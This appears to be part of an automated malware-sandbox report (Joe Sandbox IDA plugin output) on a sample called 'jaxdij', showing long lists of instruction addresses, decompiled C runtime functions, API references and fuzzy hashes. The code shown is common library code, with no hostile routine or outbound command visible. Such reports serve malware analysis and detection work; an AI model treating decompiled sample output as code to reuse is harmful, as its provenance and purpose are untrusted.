                                                                                                                          0x00256bb2
                                                                                                                          0x00256bb3
                                                                                                                          0x00256bb6
                                                                                                                          0x00256bb8
                                                                                                                          0x00256d68
                                                                                                                          0x00256d6a
                                                                                                                          0x00000000
                                                                                                                          0x00256d6c
                                                                                                                          0x00256d6c
                                                                                                                          0x00256d6f
                                                                                                                          0x00256d7e
                                                                                                                          0x00256d82
                                                                                                                          0x00256d83
                                                                                                                          0x00256d83
                                                                                                                          0x00000000
                                                                                                                          0x00256d87
                                                                                                                          0x00000000
                                                                                                                          0x00256bbe
                                                                                                                          0x00256bc3
                                                                                                                          0x00256bc6
                                                                                                                          0x00256bc9
                                                                                                                          0x00256bcf
                                                                                                                          0x00256bd8
                                                                                                                          0x00256be3
                                                                                                                          0x00256be8
                                                                                                                          0x00256beb
                                                                                                                          0x00256bee
                                                                                                                          0x00256bf7
                                                                                                                          0x00256bf7
                                                                                                                          0x00256bfa
                                                                                                                          0x00000000
                                                                                                                          0x00256bfa
                                                                                                                          0x00256bee
                                                                                                                          0x00256af1
                                                                                                                          0x00256af4
                                                                                                                          0x00256afa
                                                                                                                          0x00256afc
                                                                                                                          0x00256b09
                                                                                                                          0x00256b0a
                                                                                                                          0x00256b0d
                                                                                                                          0x00256b10
                                                                                                                          0x00256b15
                                                                                                                          0x00256d39
                                                                                                                          0x00256d3b
                                                                                                                          0x00256d3d
                                                                                                                          0x00256d40
                                                                                                                          0x00256d43
                                                                                                                          0x00256d4f
                                                                                                                          0x00256d52
                                                                                                                          0x00256d54
                                                                                                                          0x00256d55
                                                                                                                          0x00256d59
                                                                                                                          0x00256d5c
                                                                                                                          0x00256d5c
                                                                                                                          0x00256d60
                                                                                                                          0x00256d60
                                                                                                                          0x00256d60
                                                                                                                          0x00256d63
                                                                                                                          0x00256d63
                                                                                                                          0x00256b1b
                                                                                                                          0x00256b1b
                                                                                                                          0x00256b1e
                                                                                                                          0x00256b20
                                                                                                                          0x00256b23
                                                                                                                          0x00256b25
                                                                                                                          0x00256b29
                                                                                                                          0x00256b2a
                                                                                                                          0x00256b2b
                                                                                                                          0x00256b2f
                                                                                                                          0x00256b34
                                                                                                                          0x00256b3e
                                                                                                                          0x00256b43
                                                                                                                          0x00256b46
                                                                                                                          0x00256b46
                                                                                                                          0x00256b49
                                                                                                                          0x00256b4c
                                                                                                                          0x00256b4e
                                                                                                                          0x00256b51
                                                                                                                          0x00256b5a
                                                                                                                          0x00256b5e
                                                                                                                          0x00256b5f
                                                                                                                          0x00256b66
                                                                                                                          0x00256b6c
                                                                                                                          0x00256b74
                                                                                                                          0x00256b7f
                                                                                                                          0x00256b84
                                                                                                                          0x00256b8f
                                                                                                                          0x00256b94
                                                                                                                          0x00256b9a
                                                                                                                          0x00256ba3
                                                                                                                          0x00256bfd
                                                                                                                          0x00256bfd
                                                                                                                          0x00256c88
                                                                                                                          0x00256c8d
                                                                                                                          0x00256c9f
                                                                                                                          0x00256ca4
                                                                                                                          0x00256ca7
                                                                                                                          0x00256cac
                                                                                                                          0x00256cc7
                                                                                                                          0x00256daa
                                                                                                                          0x00256db0
                                                                                                                          0x00256ccd
                                                                                                                          0x00256ccd
                                                                                                                          0x00256cd8
                                                                                                                          0x00256cda
                                                                                                                          0x00256cdd
                                                                                                                          0x00256ce6
                                                                                                                          0x00256cf0
                                                                                                                          0x00000000
                                                                                                                          0x00256cf2
                                                                                                                          0x00256cf4
                                                                                                                          0x00256cf6
                                                                                                                          0x00256d0f
                                                                                                                          0x00000000
                                                                                                                          0x00256d15
                                                                                                                          0x00256d19
                                                                                                                          0x00256d1f
                                                                                                                          0x00256d22
                                                                                                                          0x00256d28
                                                                                                                          0x00256d2b
                                                                                                                          0x00000000
                                                                                                                          0x00256d2b
                                                                                                                          0x00256d19
                                                                                                                          0x00256d0f
                                                                                                                          0x00256cf0
                                                                                                                          0x00256ce6
                                                                                                                          0x00256cc7
                                                                                                                          0x00256cac
                                                                                                                          0x00256b9a
                                                                                                                          0x00256b15
                                                                                                                          0x00256aeb
                                                                                                                          0x00000000
                                                                                                                          0x00256d2e
                                                                                                                          0x00256d2e
                                                                                                                          0x00256d37
                                                                                                                          0x00256db2
                                                                                                                          0x00256db7
                                                                                                                          0x00256dbf
                                                                                                                          0x00256dc0
                                                                                                                          0x00256dc1
                                                                                                                          0x00256dcd
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • GetConsoleOutputCP.KERNEL32(BB40E64E,?,00000000,?), ref: 00256A64
                                                                                                                            • Part of subcall function 00255A69: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,002564DD,?,00000000,-00000008), ref: 00255B15
                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00256CBF
                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00256D07
                                                                                                                          • GetLastError.KERNEL32 ref: 00256DAA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415826902.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.415812138.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415862410.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415879314.0000000000264000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415891991.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2112829910-0
                                                                                                                          • Opcode ID: 3d1b977888abadbef447e97b45a40cb409f2af98fd87486762342b24c325e88f
                                                                                                                          • Instruction ID: 1c722e7ef507a8014fa5d28306a796ecbb6ade4b2322e7a869d0f26ce43dcbaa
                                                                                                                          • Opcode Fuzzy Hash: 3d1b977888abadbef447e97b45a40cb409f2af98fd87486762342b24c325e88f
                                                                                                                          • Instruction Fuzzy Hash: 4FD17775E102499FCF15CFA8D888AEDBBB4FF08305F18852AE855EB351D630A866CF54
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 002578EB Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 70%
                                                                                                                          			E002578EB(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0x263388);
				E0024D940(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E0024F6F0(_t107, E0024DD80(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E0024F6F0(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x265dcc;
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x267000();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E00251C1C(_t75, _t84, _t97, _t107);
									asm("int3");
									_push(8);
									_push(0x2633a8);
									E0024D940(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E002578EB(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E0025737D(_t103, _t108[0x18], E0024DD80( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E0025738D(_t103, _t108[0x18], E0024DD80( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E0024DD80();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}



















                                                                                                                          0x002578eb
                                                                                                                          0x002578ed
                                                                                                                          0x002578f2
                                                                                                                          0x002578f7
                                                                                                                          0x002578f9
                                                                                                                          0x002578fc
                                                                                                                          0x00257901
                                                                                                                          0x00257a11
                                                                                                                          0x00257a11
                                                                                                                          0x00257a11
                                                                                                                          0x00000000
                                                                                                                          0x00257910
                                                                                                                          0x00257910
                                                                                                                          0x00257915
                                                                                                                          0x0025791f
                                                                                                                          0x00257921
                                                                                                                          0x00257926
                                                                                                                          0x0025792b
                                                                                                                          0x0025792b
                                                                                                                          0x0025792d
                                                                                                                          0x00257930
                                                                                                                          0x00257935
                                                                                                                          0x00257957
                                                                                                                          0x00257957
                                                                                                                          0x0025795a
                                                                                                                          0x0025795d
                                                                                                                          0x0025797b
                                                                                                                          0x0025797e
                                                                                                                          0x002579bd
                                                                                                                          0x002579c0
                                                                                                                          0x002579c3
                                                                                                                          0x002579e8
                                                                                                                          0x002579ea
                                                                                                                          0x00000000
                                                                                                                          0x002579ec
                                                                                                                          0x002579ec
                                                                                                                          0x002579ee
                                                                                                                          0x00000000
                                                                                                                          0x002579f0
                                                                                                                          0x002579f0
                                                                                                                          0x002579f5
                                                                                                                          0x002579f9
                                                                                                                          0x002579f9
                                                                                                                          0x002579fa
                                                                                                                          0x00000000
                                                                                                                          0x002579fa
                                                                                                                          0x002579ee
                                                                                                                          0x002579c5
                                                                                                                          0x002579c5
                                                                                                                          0x002579c7
                                                                                                                          0x00000000
                                                                                                                          0x002579c9
                                                                                                                          0x002579c9
                                                                                                                          0x002579cb
                                                                                                                          0x00000000
                                                                                                                          0x002579cd
                                                                                                                          0x002579de
                                                                                                                          0x00000000
                                                                                                                          0x002579e3
                                                                                                                          0x002579cb
                                                                                                                          0x002579c7
                                                                                                                          0x00257980
                                                                                                                          0x00257980
                                                                                                                          0x00257984
                                                                                                                          0x00000000
                                                                                                                          0x0025798a
                                                                                                                          0x0025798a
                                                                                                                          0x0025798c
                                                                                                                          0x00000000
                                                                                                                          0x00257992
                                                                                                                          0x00257999
                                                                                                                          0x002579a1
                                                                                                                          0x002579a5
                                                                                                                          0x002579a7
                                                                                                                          0x002579aa
                                                                                                                          0x002579af
                                                                                                                          0x002579b0
                                                                                                                          0x00000000
                                                                                                                          0x002579b0
                                                                                                                          0x002579aa
                                                                                                                          0x00000000
                                                                                                                          0x002579a5
                                                                                                                          0x0025798c
                                                                                                                          0x00257984
                                                                                                                          0x0025795f
                                                                                                                          0x0025795f
                                                                                                                          0x00000000
                                                                                                                          0x0025795f
                                                                                                                          0x0025793c
                                                                                                                          0x0025793c
                                                                                                                          0x00257941
                                                                                                                          0x00257946
                                                                                                                          0x00000000
                                                                                                                          0x00257948
                                                                                                                          0x0025794a
                                                                                                                          0x00257953
                                                                                                                          0x00257962
                                                                                                                          0x00257964
                                                                                                                          0x00257a23
                                                                                                                          0x00257a23
                                                                                                                          0x00257a28
                                                                                                                          0x00257a29
                                                                                                                          0x00257a2b
                                                                                                                          0x00257a30
                                                                                                                          0x00257a35
                                                                                                                          0x00257a38
                                                                                                                          0x00257a3b
                                                                                                                          0x00257a3e
                                                                                                                          0x00257a47
                                                                                                                          0x00257a47
                                                                                                                          0x00257a40
                                                                                                                          0x00257a40
                                                                                                                          0x00257a40
                                                                                                                          0x00257a4a
                                                                                                                          0x00257a4e
                                                                                                                          0x00257a51
                                                                                                                          0x00257a52
                                                                                                                          0x00257a53
                                                                                                                          0x00257a54
                                                                                                                          0x00257a57
                                                                                                                          0x00257a60
                                                                                                                          0x00257a60
                                                                                                                          0x00257a63
                                                                                                                          0x00257a99
                                                                                                                          0x00257a65
                                                                                                                          0x00257a65
                                                                                                                          0x00257a65
                                                                                                                          0x00257a68
                                                                                                                          0x00257a7f
                                                                                                                          0x00257a7f
                                                                                                                          0x00257a68
                                                                                                                          0x00257a9e
                                                                                                                          0x00257aa8
                                                                                                                          0x00257ab4
                                                                                                                          0x00257972
                                                                                                                          0x00257972
                                                                                                                          0x00257977
                                                                                                                          0x00257978
                                                                                                                          0x002579b2
                                                                                                                          0x002579b9
                                                                                                                          0x002579fd
                                                                                                                          0x002579fd
                                                                                                                          0x00257a04
                                                                                                                          0x00257a13
                                                                                                                          0x00257a16
                                                                                                                          0x00257a22
                                                                                                                          0x00257a22
                                                                                                                          0x00257964
                                                                                                                          0x00257946
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00257915

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415826902.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.415812138.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415862410.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415879314.0000000000264000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415891991.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AdjustPointer
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1740715915-0
                                                                                                                          • Opcode ID: 13fa5460c8d1a3b90bf1c76005fe34dacbc322fb69033ca9e0b4ef14e47bb744
                                                                                                                          • Instruction ID: 9fcdcb90a5ac736e4389e73353b30f5f0efbfece4acc0ce3fdae4e1387e8102f
                                                                                                                          • Opcode Fuzzy Hash: 13fa5460c8d1a3b90bf1c76005fe34dacbc322fb69033ca9e0b4ef14e47bb744
                                                                                                                          • Instruction Fuzzy Hash: 1851E3726A8203AFDB298F10E841B7E73A5EF44712F24452DEC4557291D731EE78CBA8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0024B2C0 Relevance: 6.1, APIs: 4, Instructions: 114COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415826902.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.415812138.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415862410.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415879314.0000000000264000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415891991.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ColorObjectSelect$Text
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2688426544-0
                                                                                                                          • Opcode ID: 40daaecf30bf2fb57e4511288686a48584d3739a3cfe8d700091b6b137f0c195
                                                                                                                          • Instruction ID: 8f108c1722386722f96c8d608e04f521180d677a65dc86e5d9d201383a63e4b9
                                                                                                                          • Opcode Fuzzy Hash: 40daaecf30bf2fb57e4511288686a48584d3739a3cfe8d700091b6b137f0c195
                                                                                                                          • Instruction Fuzzy Hash: 1A518074A14208DFCB04DF68D598AACBBF1FF48314F1584A9E88A9B351DB31EA91DF41
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00248D90 Relevance: 6.1, APIs: 4, Instructions: 70windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415826902.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.415812138.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415862410.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415879314.0000000000264000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415891991.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Menu$CreateLongPopupSystemWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3388415271-0
                                                                                                                          • Opcode ID: 68d95082a9d8aa0676554e50952990e03d62b205727737bbca33c6227845e0c2
                                                                                                                          • Instruction ID: f9712923bae4db1cb5f949bbd1ce95bf56cabcbe1f0b14b54b07319729d32c0b
                                                                                                                          • Opcode Fuzzy Hash: 68d95082a9d8aa0676554e50952990e03d62b205727737bbca33c6227845e0c2
                                                                                                                          • Instruction Fuzzy Hash: 8E31A574A14204DFDB44EF68D588B9DBBF0BF48311F0580A9E889DB351DB749A94CF42
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00258FAD Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00258FAD(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x2648b0, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E00259021();
					E00259002();
					_t13 = WriteConsoleW( *0x2648b0, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}




                                                                                                                          0x00258fca
                                                                                                                          0x00258fce
                                                                                                                          0x00258fdb
                                                                                                                          0x00258fe0
                                                                                                                          0x00258ffb
                                                                                                                          0x00258ffb
                                                                                                                          0x00259001

                                                                                                                          APIs
                                                                                                                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00258B12,?,00000001,?,?,?,00256DFE,?,?,00000000), ref: 00258FC4
                                                                                                                          • GetLastError.KERNEL32(?,00258B12,?,00000001,?,?,?,00256DFE,?,?,00000000,?,?,?,00256749,?), ref: 00258FD0
                                                                                                                            • Part of subcall function 00259021: CloseHandle.KERNEL32(FFFFFFFE,00258FE0,?,00258B12,?,00000001,?,?,?,00256DFE,?,?,00000000,?,?), ref: 00259031
                                                                                                                          • ___initconout.LIBCMT ref: 00258FE0
                                                                                                                            • Part of subcall function 00259002: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00258F9E,00258AFF,?,?,00256DFE,?,?,00000000,?), ref: 00259015
                                                                                                                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00258B12,?,00000001,?,?,?,00256DFE,?,?,00000000,?), ref: 00258FF5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415826902.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.415812138.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415862410.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415879314.0000000000264000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415891991.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2744216297-0
                                                                                                                          • Opcode ID: fe1093ec2b9f3252f4615cbedc2600b7f47416ba4478439dcbd8f151f59b521d
                                                                                                                          • Instruction ID: 3f19111c9b088cd86dfe80f140a7e1d1623d3d14663b8c4474e7285c9921fd72
                                                                                                                          • Opcode Fuzzy Hash: fe1093ec2b9f3252f4615cbedc2600b7f47416ba4478439dcbd8f151f59b521d
                                                                                                                          • Instruction Fuzzy Hash: B4F0C036510155BFCF223FD5FC09A997F66FB093A2B448450FE1996170CAB2D8709BD4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00247970 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415826902.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.415812138.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415862410.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415879314.0000000000264000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415891991.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _strlen
                                                                                                                          • String ID: (
                                                                                                                          • API String ID: 4218353326-3887548279
                                                                                                                          • Opcode ID: 8bee944b328832abc74aee089c45a625e8aaa70671cbe393a5150ab8f0671009
                                                                                                                          • Instruction ID: 9b1a61a2195b5e3e7a0c5bcd15da29cf9583b7bde2ee145f694e52ee8d65ab68
                                                                                                                          • Opcode Fuzzy Hash: 8bee944b328832abc74aee089c45a625e8aaa70671cbe393a5150ab8f0671009
                                                                                                                          • Instruction Fuzzy Hash: 4D51E471914609ABCB19DF58C886BADBBB0FB44314F04C969E869DB390D334EAA4CF45
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0025775B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 47%
                                                                                                                          			E0025775B(void* __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr _a16, signed int* _a20, signed int _a24, signed int _a28, signed char _a32) {
				void* __ebx;
				void* __esi;
				void* _t37;
				signed int _t46;
				void* _t52;
				void* _t54;
				signed int* _t55;
				void* _t58;
				void* _t60;
				intOrPtr* _t62;

				E00252117(_a12);
				_pop(_t54);
				_t37 = E00251CAE(_t52, _t54, __edx, _t60);
				_t55 = _a20;
				_t58 = _a4;
				if( *((intOrPtr*)(_t37 + 0x20)) != 0 ||  *_t58 == 0xe06d7363 ||  *_t58 == 0x80000026 || ( *_t55 & 0x1fffffff) < 0x19930522 || (_t55[8] & 0x00000001) == 0) {
					if(( *(_t58 + 4) & 0x00000066) == 0) {
						if(_t55[3] != 0) {
							L14:
							if( *_t58 != 0xe06d7363 ||  *((intOrPtr*)(_t58 + 0x10)) < 3 ||  *((intOrPtr*)(_t58 + 0x14)) <= 0x19930522) {
								L19:
								E00257AC2(_t58, _t58, _a8, _a12, _a16, _t55, _a32, _a24, _a28);
								goto L20;
							} else {
								_t62 =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0x1c)) + 8));
								if(_t62 == 0) {
									goto L19;
								}
								 *0x267000(_t58, _a8, _a12, _a16, _t55, _a24, _a28, _a32 & 0x000000ff);
								return  *_t62();
							}
						}
						_t46 =  *_t55 & 0x1fffffff;
						if(_t46 < 0x19930521 || _t55[7] == 0) {
							if(_t46 < 0x19930522 || (_t55[8] >> 0x00000002 & 0x00000001) == 0) {
								goto L20;
							} else {
								goto L14;
							}
						} else {
							goto L14;
						}
					}
					if(_t55[1] != 0 && _a24 == 0) {
						L0025735A(_a8, _a16, _t55);
					}
					goto L20;
				} else {
					L20:
					return 1;
				}
			}













                                                                                                                          0x00257764
                                                                                                                          0x00257769
                                                                                                                          0x0025776a
                                                                                                                          0x0025776f
                                                                                                                          0x00257774
                                                                                                                          0x00257784
                                                                                                                          0x002577ac
                                                                                                                          0x002577d7
                                                                                                                          0x002577f7
                                                                                                                          0x002577fd
                                                                                                                          0x00257839
                                                                                                                          0x0025784d
                                                                                                                          0x00000000
                                                                                                                          0x0025780a
                                                                                                                          0x0025780d
                                                                                                                          0x00257812
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0025782c
                                                                                                                          0x00000000
                                                                                                                          0x00257834
                                                                                                                          0x002577fd
                                                                                                                          0x002577db
                                                                                                                          0x002577e2
                                                                                                                          0x002577eb
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x002577e2
                                                                                                                          0x002577b1
                                                                                                                          0x002577c7
                                                                                                                          0x002577cc
                                                                                                                          0x00000000
                                                                                                                          0x00257855
                                                                                                                          0x00257855
                                                                                                                          0x00000000
                                                                                                                          0x00257857

                                                                                                                          APIs
                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00257764
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415826902.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.415812138.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415862410.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415879314.0000000000264000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000002.00000002.415891991.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ___except_validate_context_record
                                                                                                                          • String ID: csm$csm
                                                                                                                          • API String ID: 3493665558-3733052814
                                                                                                                          • Opcode ID: 561f79f9dfc6028a807b603e8f9aaf7097509357b6f0021318705cb54346aa91
